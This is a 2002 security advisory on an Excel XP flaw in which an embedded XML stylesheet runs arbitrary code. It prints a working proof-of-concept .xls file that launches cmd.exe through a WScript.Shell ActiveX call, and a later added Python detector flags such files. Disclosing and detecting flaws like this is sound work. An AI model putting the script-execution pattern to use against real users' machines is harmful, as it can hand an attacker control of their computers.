Excel XP XML Stylesheet Problems

Georgi Guninski security advisory #55, 2002

Systems affected: Excel XP
Risk: Low (user interaction required)
Date: 24 May 2002

Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Anything in this document may change without notice.

Interesting news:
According to
http://www.eweek.com/article/0,3658,s%253D701%2526a%253D26875,00.asp
"...He (MS) later acknowledged that some Microsoft code was so flawed
it could not be safely disclosed..."
LOL
They call this trustworthy??????

Description:

Excel XP tries to play with new technologies like XML and XSLT.
Unfortunately Excel seems "so flawed" that if the user opens a .xls
file and chooses to view it with an XML stylesheet, arbitrary code
may be executed. As script kiddies know, this may lead to taking full
control over the user's computer. Excel does not give any warning to
the user - it just asks whether to use the stylesheet or not. The
default option is *not* to display with the stylesheet, though.

Details:

Consider this xls file
------xls_sux.xls-----
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
----------------------

It contains both XML and a stylesheet in one file.
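
A defender-side check for the file shape shown above, added here as an example (it is not part of the original advisory): it flags files named .xls whose content is XML with an embedded stylesheet reference and script block, which is how the sample differs from a binary workbook. The function name, finding labels and sample inputs are assumptions constructed for this illustration.

```python
import re
import sys

OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # header of a binary (OLE2) .xls
# Markers taken from the structure of the advisory's sample file.
STYLESHEET_PI = re.compile(
    rb"<\?xml-stylesheet\b[^>]*\bhref\s*=\s*[\"']([^\"']*)[\"']", re.I)
XSL_SCRIPT = re.compile(rb"<xsl:script\b", re.I)
ACTIVEX = re.compile(rb"\bActiveXObject\b")

# Constructed samples (not real captures); the script body is deliberately empty.
SAMPLE_FLAGGED = b"""<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#self" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script><![CDATA[ /* script body omitted */ ]]></xsl:script>
<data>constructed sample</data>
</xsl:stylesheet>
"""
SAMPLE_PLAIN_XML = b'<?xml version="1.0"?>\n<Workbook><Cell>1</Cell></Workbook>\n'
SAMPLE_BINARY = OLE2_MAGIC + b"\x00" * 32


def inspect_xls(data: bytes) -> list[str]:
    """Return findings for a file named .xls; an empty list means nothing matched."""
    if data.startswith(OLE2_MAGIC):
        return []  # genuine compound-document workbook, not the XML case
    head = data.lstrip(b"\xef\xbb\xbf \t\r\n")  # skip UTF-8 BOM and whitespace
    if not head.startswith(b"<?xml"):
        return []  # limitation: UTF-16 encoded XML is not recognised here
    findings = ["xml-content-in-xls"]
    pi = STYLESHEET_PI.search(data)
    if pi:
        findings.append("stylesheet-pi")
        if pi.group(1).startswith(b"#"):  # fragment href: stylesheet is the file itself
            findings.append("self-referencing-stylesheet")
    if XSL_SCRIPT.search(data):
        findings.append("xsl-script-block")
    if ACTIVEX.search(data):
        findings.append("activex-instantiation")
    return findings


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, inspect_xls(fh.read()) or "no findings")
```
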

Workaround/Solution:
Do not choose to use XML stylesheets in Excel if asked.
poweroff(8) the poor windoze box if you see Excel mention
stylesheets.

Vendor status: Microsoft was notified on 23 May 2002

Regards,
Georgi Guninski
http://www.guninski.com
